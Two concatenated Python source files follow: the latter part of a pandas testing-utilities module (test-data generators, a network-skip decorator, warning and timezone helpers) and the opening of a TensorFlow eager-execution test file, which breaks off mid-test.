return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
'"{idx_type}" is not a legal value for `idx_type`, '
'use "i"/"f"/"s"/"u"/"dt/"p"/"td".'.format(idx_type=idx_type)
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = "{prefix}_l{i}_g{j}".format(prefix=prefix, i=i, j=j)
cnt[label] = ndupe_l[i]
# cute Counter trick
result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: "R{rows}C{cols}".format(rows=r, cols=c)
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
Density : float, optional
Float in (0, 1) that gives the percentage of non-missing numbers in
the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
class TestSubDict(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supercedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas.util.testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(
"Skipping test due to known errno"
" and error {error}".format(error=err)
)
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
"Skipping test because exception "
"message is known and error {error}".format(error=err)
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(
"Skipping test due to lack of connectivity"
" and error {error}".format(error=err)
)
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except AttributeError:
# module may not have __warningregistry__
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
"File where warning is raised: {actual} != "
"{caller}. Warning message: {message}"
).format(
actual=actual_warning.filename,
caller=caller.filename,
message=actual_warning.message,
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = "Did not see expected warning of class {name!r}.".format(
name=expected_warning.__name__
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
"Caused unexpected warning(s): {!r}.".format(extra_warnings)
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz):
"""Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
skipna_wrapper : function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : list
The list of string. Each element represents the row of csv.
Returns
-------
expected : string
Expected output of to_csv() in current OS
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
|
core_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import execute
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
def truncated_normal(shape):
return execute.execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
class TFETest(test_util.TensorFlowTestCase):
def testContext(self):
ctx = context.Context()
self.assertFalse(ctx.in_graph_mode())
self.assertTrue(ctx.in_eager_mode())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertIsNone(ctx.summary_writer_resource)
ctx.summary_writer_resource = 'mock'
self.assertEqual('mock', ctx.summary_writer_resource)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.in_graph_mode(),
ctx.in_eager_mode(), ctx.scope_name, ctx.summary_writer_resource,
ctx.device_name, ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
def testContextConfig(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant(1.).as_gpu_tensor()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute.execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].as_cpu_tensor().numpy()
self.assertEqual(3, result)
def testCopyBetweenDevices(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.as_cpu_tensor()
x = x.as_gpu_tensor()
x = x.as_gpu_tensor()
x = x.as_cpu_tensor()
# Invalid device
with self.assertRaises(errors.InvalidArgumentError):
x.as_gpu_tensor(context.context().num_gpus() + 1)
def testNumpyForceCPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.as_gpu_tensor()
self.assertAllEqual(c2g.numpy(), cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.as_cpu_tensor()
self.assertNotEqual(ta._handle, tb._handle)
self.assertAllEqual(ta.numpy(), tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute.execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertEqual(15, product.numpy())
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
# That should be okay.
product = execute.execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3), constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertEqual(15, product.numpy())
def testMatMulGPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
three = constant_op.constant([[3.]]).as_gpu_tensor()
five = constant_op.constant([[5.]]).as_gpu_tensor()
product = execute.execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertEqual([[15.0]], product.numpy())
def testExecuteStringAttr(self):
checked_three = execute.execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute.execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute.execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal.numpy())
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute.execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute.execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertEqual(7, total.numpy())
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute.execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute.execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertEqual([[15]], product.numpy())
def testExecuteShapeAttr(self):
execute.execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute.execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute.execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b.numpy())
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute.execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b.numpy())
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
